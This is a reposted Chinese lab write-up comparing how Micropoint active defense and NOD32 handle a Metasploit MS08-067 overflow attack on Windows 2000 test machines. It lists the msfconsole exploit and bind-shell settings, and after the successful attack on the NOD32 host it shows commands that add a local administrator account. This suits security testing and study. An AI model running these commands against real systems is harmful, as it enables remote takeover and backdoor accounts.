计算机软件漏洞防御方法,溢出(漏洞)***的实现及防御
前言
媒體上關(guān)于系統(tǒng)漏洞的話題一直不斷,在我所接觸的用一些朋友和用戶中雖然也知道打系統(tǒng)補丁很重要,但卻又一直不以為然總以為網(wǎng)絡(luò)上的危險離自己很遠(yuǎn),大部份人都認(rèn)為進(jìn)行一次遠(yuǎn)程***很困難甚至認(rèn)為只要安裝了防病毒軟件就一切大吉,是不是這樣呢?讓我們看看今天的操作。
主動防御技術(shù)通過微點推出后給現(xiàn)在的安全界注入了一針興奮劑,現(xiàn)在各大廠商都宣傳自己有了主動防御技術(shù),而網(wǎng)絡(luò)上針對它的宣傳也是毀譽參半。 一切都以事實為主,有圖有真相。
測試環(huán)境
Metasploit
操作系統(tǒng):CentOS5
軟件版本:framework-3.5.0-linux-i686.run
IP 地址:192.168.0.10
Metasploit(http://www.metasploit.com/framework/download/)是一款開源的安全漏洞檢測工具。由于Metasploit是免費的工具,因此安全工作人員常用Metasploit工具來檢測系統(tǒng)的安全性。Metasploit Framework (MSF)是2003 年以開放源代碼方式發(fā)布、可自由獲取的開發(fā)框架,這個環(huán)境為***測試、shellcode 編寫和漏洞研究提供了一個可靠的平臺。它集成了各平臺上常見的溢出漏洞和流行的shellcode,并且不斷更新,最新版本的MSF 包含了180多種當(dāng)前流行的操作系統(tǒng)和應(yīng)用軟件的exploit,以及100多 個shellcode。作為安全工具,它在安全檢測中起到不容忽視的作用,并為漏洞自動化探測和及時檢測系統(tǒng)漏洞提供有力的保障。
微點主動防御軟件
操作系統(tǒng):Windows 2000 SP2
微點版本:2010-12-09
IP 地址:192.168.0.200
NOD32環(huán)境
操作系統(tǒng):Windows 2000 SP2
軟件版本:2010-12-09
IP 地址:192.168.0.100
操作步驟
搭建測試環(huán)境
按簡介中的說明搭建相應(yīng)的測試環(huán)境,保證三臺機器都能相互通訊,有關(guān)實驗環(huán)境的搭建方法可以參考利用單主機搭建和物理機器通訊的測試網(wǎng)絡(luò)這篇文章。有關(guān)Metaspolit的安裝方法網(wǎng)絡(luò)上有很多,其方法也不復(fù)雜。
查看本地用戶
在安裝了微點主動防御軟件的計算機上打開“用戶管理”查看本地的所有用戶。
對微點進(jìn)行溢出***
登錄到安裝了Metasploit的系統(tǒng),同時運行以下的命令啟動到Metasploit程序,同時設(shè)定調(diào)用的溢出漏洞為MS08-067,遠(yuǎn)程主機為192.168.0.200,本地聯(lián)接端口為5555,如下圖所示。
msfconsole
use?exploit/windows/smb/ms08_067_netapi
setPAYLOAD?windows/shell/bind_tcp
setRHOST?192.168.0.200
setLPORT?5555
exploit
查看***結(jié)果(微點)
輸入上述指令后,本地Metasploit會提示溢出結(jié)束但未能取得會話權(quán)限,而此時微點已檢測到溢出***,同時還給出了遠(yuǎn)程***者的IP地址,證明安裝微點主動防御軟件后能有效防止溢出***。具體如下圖所示。
對NOD32進(jìn)行溢出***
登入Metasploit重新設(shè)定遠(yuǎn)程***的主機地址,因開始已指定了具體的溢出漏洞,這里只需要重新設(shè)定遠(yuǎn)程主機地址就可以了。具體指令及截圖如下所示。
unset?RHOST
setRHOST?192.168.0.100
show?options
exploit
查看***結(jié)果(NOD32)
在輸入上述指令后會提示已獲取遠(yuǎn)程主機的管理權(quán)限,此時在遠(yuǎn)程管理會話中輸入相關(guān)指令在計算機中新增用戶并賦予其管理員權(quán)限,具體指令及截圖如下所示。
netusertest?123?/add
net?localgroup?administrators?test?/add
測試遠(yuǎn)程添加的用戶
為了檢測溢出***的作用,打開“用戶管理”界面時會發(fā)現(xiàn)已新增test用戶,同時可以使用該用戶登陸系統(tǒng)且擁有管理員權(quán)限,如下圖所示。
后記
從上面的測試可以得知微點所宣傳的防止溢出(漏洞)***確實是有效的。以下是關(guān)于該功能的描述。
“本發(fā)明涉及計算機緩沖區(qū)溢出***的檢測方法,即,通過建立勾掛函數(shù),檢查線程所建立的堆棧幀的返回地址,并根據(jù)該返回地址判斷是否發(fā)生緩沖區(qū)溢出,并在發(fā)現(xiàn)緩沖區(qū)溢出后,將引起該緩沖區(qū)溢出的線程結(jié)束。利用本發(fā)明的緩沖區(qū)溢出***的檢測方法,不但可以高效、準(zhǔn)確的檢查出惡意程序的緩沖區(qū)溢出***,而且避免了現(xiàn)有技術(shù)中的殺毒軟件對新生病毒特征代碼獲取的滯后性,和防火墻系統(tǒng)使用時的繁瑣以及給計算機知識很少的用戶帶來的麻煩。即使對于新生的緩沖區(qū)溢出***的病毒、***也可以準(zhǔn)確、高效的進(jìn)行攔截。”
“申請(專利)號:200510007681.5”
聲明
本文的目的絕不是為那些懷有不良動機的人提供支持,也不承擔(dān)因為技術(shù)被濫用所產(chǎn)生的連帶責(zé)任;本文的目的在到最在限度地喚起大家的網(wǎng)絡(luò)安全意識,正視我們的網(wǎng)絡(luò)世界所面臨的一聲危機,并采取行動。
總結(jié)
以上是生活随笔為你收集整理的计算机软件漏洞防御方法,溢出(漏洞)***的实现及防御的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 混合模式程序matlab,VS2013
- 下一篇: OpenAI Dota2 5v5模式击败